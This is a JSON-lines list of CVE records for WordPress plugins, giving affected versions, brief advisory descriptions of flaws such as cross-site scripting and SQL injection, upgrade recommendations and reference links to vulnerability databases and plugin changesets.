{"CVE_ID":"CVE-2022-4306","slug":"panda-pods-repeater-field","versionEndExcluding":"1.5.4","description":"The Panda Pods Repeater Field WordPress plugin before 1.5.4 does not sanitize and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against a user having at least Contributor permission.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/18d7f9af-7267-4723-9d6f-05b895c94dbe\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/18d7f9af-7267-4723-9d6f-05b895c94dbe\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0405","slug":"burst-statistics","versionEndExcluding":"1.5.4","description":"The Burst Statistics \u2013 Privacy-Friendly Analytics for WordPress plugin, version 1.5.3, is vulnerable to Post-Authenticated SQL Injection via multiple JSON parameters in the \/wp-json\/burst\/v1\/data\/compare endpoint. Affected parameters include 'browser', 'device', 'page_id', 'page_url', 'platform', and 'referrer'. This vulnerability arises due to insufficient escaping of user-supplied parameters and the lack of adequate preparation in SQL queries. As a result, authenticated attackers with editor access or higher can append additional SQL queries into existing ones, potentially leading to unauthorized access to sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e349f07d-a520-4700-a6e0-25e68c1deeae?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e349f07d-a520-4700-a6e0-25e68c1deeae?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/burst-statistics\\\/trunk\\\/statistics\\\/class-statistics.php?rev=3011996#L380\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/burst-statistics\\\/trunk\\\/statistics\\\/class-statistics.php?rev=3011996#L380\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/burst-statistics\\\/trunk\\\/statistics\\\/class-statistics.php?rev=3011996#L926\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/burst-statistics\\\/trunk\\\/statistics\\\/class-statistics.php?rev=3011996#L926\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3020809%40burst-statistics%2Ftrunk&old=3012004%40burst-statistics%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3020809%40burst-statistics%2Ftrunk&old=3012004%40burst-statistics%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6268","slug":"json-content-importer","versionImpact":"1.5.3","versionEndExcluding":"1.5.4","description":"The JSON Content Importer WordPress plugin before 1.5.4 does not sanitise and escape the tab parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"Update to version 1.5.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/15b9ab48-c038-4f2e-b823-1e374baae985\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/15b9ab48-c038-4f2e-b823-1e374baae985\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3811","slug":"salient-shortcodes","versionImpact":"1.5.3","versionEndExcluding":"1.5.4","description":"The Salient Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'icon' shortcode in all versions up to, and including, 1.5.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.5.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/70682a2d-16f6-4d7e-bf69-f0f3999f03de?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/70682a2d-16f6-4d7e-bf69-f0f3999f03de?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/salient-responsive-multipurpose-theme\\\/4363266\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/salient-responsive-multipurpose-theme\\\/4363266\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8478","slug":"amazonsimpleadmin","versionImpact":"1.5.3","versionEndExcluding":"1.5.4","description":"The Affiliate Super Assistent plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 1.5.3. This is due to the software allowing users to supply arbitrary shortcodes in comments when the 'Parse comments' option is enabled. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","recommendation":"Update to version 1.5.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7f50769c-77b8-42ff-b67d-b9b289fc51da?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7f50769c-77b8-42ff-b67d-b9b289fc51da?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/amazonsimpleadmin\\\/trunk\\\/AsaCore.php#L285\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/amazonsimpleadmin\\\/trunk\\\/AsaCore.php#L285\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3147740%40amazonsimpleadmin&new=3147740%40amazonsimpleadmin&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3147740%40amazonsimpleadmin&new=3147740%40amazonsimpleadmin&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5291","slug":"blog-filter","versionImpact":"1.5.3","versionEndExcluding":"1.5.4","description":"The Blog Filter plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'AWL-BlogFilter' shortcode in versions up to, and including, 1.5.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.5.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2974261\\\/blog-filter#file54\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2974261\\\/blog-filter#file54\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/blog-filter\\\/tags\\\/1.5.3\\\/blog-filter-output.php#L128\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/blog-filter\\\/tags\\\/1.5.3\\\/blog-filter-output.php#L128\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b95c1bf7-bb05-44d3-a185-7e38e62b7201?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b95c1bf7-bb05-44d3-a185-7e38e62b7201?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3810","slug":"salient-shortcodes","versionImpact":"1.5.3","versionEndExcluding":"1.5.4","description":"The Salient Shortcodes plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.5.3 via the 'icon' shortcode 'image' attribute. This makes it possible for authenticated attackers, with contributor-level and above permissions, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where php file type can be uploaded and included.","recommendation":"Update to version 1.5.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d1b3d4d5-9d2b-4924-a830-27c07fa1ba98?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d1b3d4d5-9d2b-4924-a830-27c07fa1ba98?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/salient-responsive-multipurpose-theme\\\/4363266\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/salient-responsive-multipurpose-theme\\\/4363266\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-24651","slug":"wp-migration-duplicator","versionImpact":"1.5.3","versionEndExcluding":"1.5.4","description":"Insertion of Sensitive Information into Log File vulnerability in WebToffee WordPress Backup & Migration allows Retrieve Embedded Sensitive Data. This issue affects WordPress Backup & Migration: from n\/a through 1.5.3.","recommendation":"Update to version 1.5.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-migration-duplicator\\\/vulnerability\\\/wordpress-webtoffee-wp-backup-and-migration-plugin-1-5-3-sensitive-data-exposure-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-migration-duplicator\\\/vulnerability\\\/wordpress-webtoffee-wp-backup-and-migration-plugin-1-5-3-sensitive-data-exposure-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10326","slug":"rometheme-for-elementor","versionImpact":"1.5.3","versionEndExcluding":"1.5.4","description":"The RomethemeKit For Elementor plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the save_options and reset_widgets functions in all versions up to, and including, 1.5.3. This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify plugin settings or reset plugin widgets to their default state (all enabled). NOTE: This vulnerability was partially fixed in version 1.5.3.","recommendation":"Update to version 1.5.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3220079\\\/rometheme-for-elementor\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3220079\\\/rometheme-for-elementor\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3231792\\\/rometheme-for-elementor\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3231792\\\/rometheme-for-elementor\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/230b3f2f-44cf-46eb-8e6a-3c52f2ea2fb9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/230b3f2f-44cf-46eb-8e6a-3c52f2ea2fb9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7808","slug":"wp-shopify","versionImpact":"1.5.3","versionEndExcluding":"1.5.4","description":"The WP Shopify WordPress plugin before 1.5.4 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"Update to version 1.5.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fa199423-6526-47f6-bab5-9f6dff0f236a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fa199423-6526-47f6-bab5-9f6dff0f236a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0977","slug":"timeline-widget-addon-for-elementor","versionImpact":"1.5.3","versionEndExcluding":"1.5.4","description":"The Timeline Widget For Elementor (Elementor Timeline, Vertical & Horizontal Timeline) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via image URLs in the plugin's timeline widget in all versions up to, and including, 1.5.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page, changes the slideshow type, and then changes it back to an image.","recommendation":"Update to version 1.5.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/03073726-58d0-45b3-b7a6-7d12dbede919?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/03073726-58d0-45b3-b7a6-7d12dbede919?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3029865%40timeline-widget-addon-for-elementor&new=3029865%40timeline-widget-addon-for-elementor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3029865%40timeline-widget-addon-for-elementor&new=3029865%40timeline-widget-addon-for-elementor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4836","slug":"breadcrumb","versionEndExcluding":"1.5.33","description":"The Breadcrumb WordPress plugin before 1.5.33 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e9a228dc-d32e-4918-898d-4d7af4662a14\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e9a228dc-d32e-4918-898d-4d7af4662a14\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3583","slug":"simple-facebook-plugin","versionImpact":"1.5.2","versionEndExcluding":"1.5.3","description":"The Simple Like Page Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 1.5.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.5.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/070f6820-e70c-4325-b5cb-d2010da34dce?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/070f6820-e70c-4325-b5cb-d2010da34dce?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3092346\\\/simple-facebook-plugin\\\/trunk?contextall=1&old=3051436&old_path=%2Fsimple-facebook-plugin%2Ftrunk\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3092346\\\/simple-facebook-plugin\\\/trunk?contextall=1&old=3051436&old_path=%2Fsimple-facebook-plugin%2Ftrunk\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4204","slug":"ultimate-woocommerce-auction-pro","versionImpact":"1.5.2","versionEndExcluding":"1.5.3","description":"The Ultimate Auction Pro plugin for WordPress is vulnerable to SQL Injection via the \u2018auction_id\u2019 parameter in all versions up to, and including, 1.5.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 1.5.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/auctionplugin.net\\\/changelog\\\/ultimate-woo-auction-pro\\\/\",\"name\":\"https:\\\/\\\/auctionplugin.net\\\/changelog\\\/ultimate-woo-auction-pro\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e492029d-6613-4881-b986-9fe14cb2cf74?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e492029d-6613-4881-b986-9fe14cb2cf74?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7202","slug":"fatal-error-notify","versionEndExcluding":"1.5.3","description":"The Fatal Error Notify WordPress plugin before 1.5.3 does not have authorisation and CSRF checks in its test_error AJAX action, allowing any authenticated users, such as subscriber to call it and spam the admin email address with error messages. The issue is also exploitable via CSRF","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d923ba5b-1c20-40ee-ac69-cd0bb65b375a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d923ba5b-1c20-40ee-ac69-cd0bb65b375a\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/research.cleantalk.org\\\/cve-2023-7202-fatal-error-notify-error-email-sending-csrf\\\/\",\"name\":\"https:\\\/\\\/research.cleantalk.org\\\/cve-2023-7202-fatal-error-notify-error-email-sending-csrf\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0442","slug":"loan-comparison","versionEndExcluding":"1.5.3","description":"The Loan Comparison WordPress plugin before 1.5.3 does not validate and escape some of its query parameters before outputting them back in a page\/post via an embedded shortcode, which could allow an attacker to inject javascript into the site via a crafted URL.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/34d95d88-4114-4597-b4db-e9f5ef80d322\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/34d95d88-4114-4597-b4db-e9f5ef80d322\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-49329","slug":"agile-store-locator","versionImpact":"1.5.2","versionEndExcluding":"1.5.3","description":"Unrestricted Upload of File with Dangerous Type vulnerability in Agile Logix Store Locator WordPress allows Upload a Web Shell to a Web Server. This issue affects Store Locator WordPress: from n\/a through 1.5.2.","recommendation":"Update to version 1.5.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/agile-store-locator\\\/vulnerability\\\/wordpress-store-locator-wordpress-1-5-2-arbitrary-file-upload-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/agile-store-locator\\\/vulnerability\\\/wordpress-store-locator-wordpress-1-5-2-arbitrary-file-upload-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0366","slug":"loan-comparison","versionEndExcluding":"1.5.3","description":"The Loan Comparison WordPress plugin before 1.5.3 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7d68b0df-7169-46b2-b8e3-4d0c2aa8d605\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7d68b0df-7169-46b2-b8e3-4d0c2aa8d605\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10324","slug":"rometheme-for-elementor","versionImpact":"1.5.2","versionEndExcluding":"1.5.3","description":"The RomethemeKit For Elementor plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.5.2 via the register_controls function in widgets\/offcanvas-rometheme.php. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, and draft template data.","recommendation":"Update to version 1.5.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3220079\\\/rometheme-for-elementor\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3220079\\\/rometheme-for-elementor\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd726b20-75c9-408e-86fc-061db591a9db?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd726b20-75c9-408e-86fc-061db591a9db?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13584","slug":"picture-gallery","versionImpact":"1.5.19","versionEndExcluding":"1.5.20","description":"The Picture Gallery \u2013 Frontend Image Uploads, AJAX Photo List plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'videowhisper_pictures' shortcode in all versions up to, and including, 1.5.19 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.5.20, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/picture-gallery\\\/trunk\\\/inc\\\/shortcodes.php#L49\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/picture-gallery\\\/trunk\\\/inc\\\/shortcodes.php#L49\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3218329%40picture-gallery&new=3218329%40picture-gallery&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3218329%40picture-gallery&new=3218329%40picture-gallery&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0f721733-2245-4d8d-9881-91cc0b48551b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0f721733-2245-4d8d-9881-91cc0b48551b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4888","slug":"simple-facebook-plugin","versionImpact":"1.5.1","versionEndExcluding":"1.5.2","description":"The Simple Like Page Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'sfp-page-plugin' shortcode in versions up to, and including, 1.5.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.5.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f81df26f-4390-4626-8539-367a52f8a027?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f81df26f-4390-4626-8539-367a52f8a027?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-facebook-plugin\\\/trunk\\\/views\\\/view-page-plugin.php?rev=2083359#L37\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-facebook-plugin\\\/trunk\\\/views\\\/view-page-plugin.php?rev=2083359#L37\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-facebook-plugin\\\/trunk\\\/views\\\/view-page-plugin.php?rev=2083359#L38\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-facebook-plugin\\\/trunk\\\/views\\\/view-page-plugin.php?rev=2083359#L38\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-facebook-plugin\\\/trunk\\\/views\\\/view-page-plugin.php?rev=2083359#L39\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-facebook-plugin\\\/trunk\\\/views\\\/view-page-plugin.php?rev=2083359#L39\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2988694\\\/simple-facebook-plugin#file17\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2988694\\\/simple-facebook-plugin#file17\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13438","slug":"speedsize-ai-image-optimizer","versionImpact":"1.5.1","versionEndExcluding":"1.5.2","description":"The SpeedSize Image & Video AI-Optimizer plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.5.1. This is due to missing or incorrect nonce validation on the 'speedsize_clear_css_cache_action' function. This makes it possible for unauthenticated attackers to clear the plugins cache via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.5.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3236368%40speedsize-ai-image-optimizer&new=3236368%40speedsize-ai-image-optimizer&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3236368%40speedsize-ai-image-optimizer&new=3236368%40speedsize-ai-image-optimizer&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1404c675-49b3-48a5-8aac-826c58755b8e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1404c675-49b3-48a5-8aac-826c58755b8e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12682","slug":"smart-maintenance-mode","versionImpact":"1.5.1","versionEndExcluding":"1.5.2","description":"The Smart Maintenance Mode WordPress plugin before 1.5.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 1.5.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/79d0a139-0fb3-4a4b-ac33-80cbc6cb3831\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/79d0a139-0fb3-4a4b-ac33-80cbc6cb3831\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-49328","slug":"agile-store-locator","versionImpact":"1.5.1","versionEndExcluding":"1.5.2","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Agile Logix Store Locator WordPress allows SQL Injection. This issue affects Store Locator WordPress: from n\/a through 1.5.1.","recommendation":"Update to version 1.5.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/agile-store-locator\\\/vulnerability\\\/wordpress-store-locator-wordpress-1-5-1-sql-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/agile-store-locator\\\/vulnerability\\\/wordpress-store-locator-wordpress-1-5-1-sql-injection-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12683","slug":"smart-maintenance-mode","versionImpact":"1.5.1","versionEndExcluding":"1.5.2","description":"The Smart Maintenance Mode WordPress plugin before 1.5.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 1.5.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1569ee00-56c3-4a1b-940e-e0256a748675\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1569ee00-56c3-4a1b-940e-e0256a748675\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0373","slug":"lightweight-accordion","versionEndExcluding":"1.5.15","description":"The Lightweight Accordion WordPress plugin before 1.5.15 does not validate and escape some of its block options before outputting them back in a page\/post where the block is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fe60ea83-b584-465a-8128-b7358d8da3af\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fe60ea83-b584-465a-8128-b7358d8da3af\",\"refsource\":\"MISC\",\"tags\":[]}]"}
